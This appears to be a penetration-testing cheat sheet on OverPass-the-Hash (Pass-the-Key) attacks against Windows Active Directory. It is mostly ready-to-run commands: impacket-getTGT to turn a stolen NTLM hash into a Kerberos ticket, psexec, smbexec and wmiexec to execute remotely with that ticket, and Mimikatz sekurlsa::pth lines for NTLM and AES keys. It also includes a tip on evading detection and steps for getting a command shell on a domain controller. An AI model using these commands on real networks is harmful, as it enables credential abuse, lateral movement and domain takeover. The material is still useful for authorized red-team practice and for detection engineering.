Whereas that hash is used to authenticate in Pass the Hash attacks, in OverPass the Hash attacks, it is used to submit a signed request to the Kerberos Domain Controller (KDC) for a full Kerberos TGT (Ticket Granting Ticket) or service ticket on behalf of that compromised user. That ticket can provide access to a wide range of services and assets.
The idea of overpass-the-hash is for an attacker to use the NTLM hash of another user account to obtain a Kerberos ticket which can be used to access network resources. This can come in handy if you are only able to obtain the NTLM hash for an account.
- Over Pass the Hash/Pass the Key (HackTricks)
- Lateral Movement: Over Pass the Hash (Hacking Articles)
- Pass the key (with good examples!)

Requires access to the admin share “Admin$”, which requires local administrative rights on
the target machine.
- Valid NTLM hash or AES key of a user on a compromised computer or DC
- Administrative privileges on the compromised machine
Remotely (Kali) – Using Impacket
Use a password, hash or aesKey, it will request a TGT and save it as ccache.
Request Kerberos authorized ticket in the form of ccache file
Supports use of a password, NTLM hash or AES key.
IP=x.x.x.x # IP of DC
impacket-getTGT -dc-ip $IP -hashes :<NTLM hash> ${DOMAIN}/${USER}
Inject the ticket to access the resource
export KRB5CCNAME=${USER}.ccache
impacket-psexec -dc-ip $IP -target-ip $IP -no-pass -k ${DOMAIN}/${USER}@<target machine name>.${DOMAIN}
impacket-smbexec -dc-ip $IP -target-ip $IP -no-pass -k ${DOMAIN}/${USER}@<target machine name>.${DOMAIN}
impacket-wmiexec -dc-ip $IP -target-ip $IP -no-pass -k ${DOMAIN}/${USER}@<target machine name>.${DOMAIN}
Locally (victim) – Using Mimikatz
See Mimikatz.
Fetch all keys NTLM (RC4), AES128, AES256 key
Open a Powershell window as the compromised user
sekurlsa::pth /user:john /domain:example.com
/ntlm:<NTLM HASH> /run:PowerShell.exe
sekurlsa::pth /user:Administrator /domain:ignite.local /aes128:<AES 128 key>
sekurlsa::pth /user:Administrator /domain:ignite.local /aes256:<AES 256 key>
If you will use NTLM (RC4), ASE128, ASE256 simultaneously for injecting into Kerberos ticket, this step is more secure and undetectable in the network (according to Hacking Articles).
sekurlsa::pth /user:Administrator /domain:igntie.local /ntlm:<NTLM HASH> /aes128:<AES 128 KEY> /aes256:<AES 256 key>
Generate a TGT by connecting to a network share (SMB) on the DC and list tickets
net use \\dc01
dir \\dc01\c$
We can now use Kerberos authentication instead of NTLM. We can use any tools that rely on Kerberos like PsExec (see Sysinternals).
Run commands remotely on the DC
psexec.exe \\dc01 cmd.exe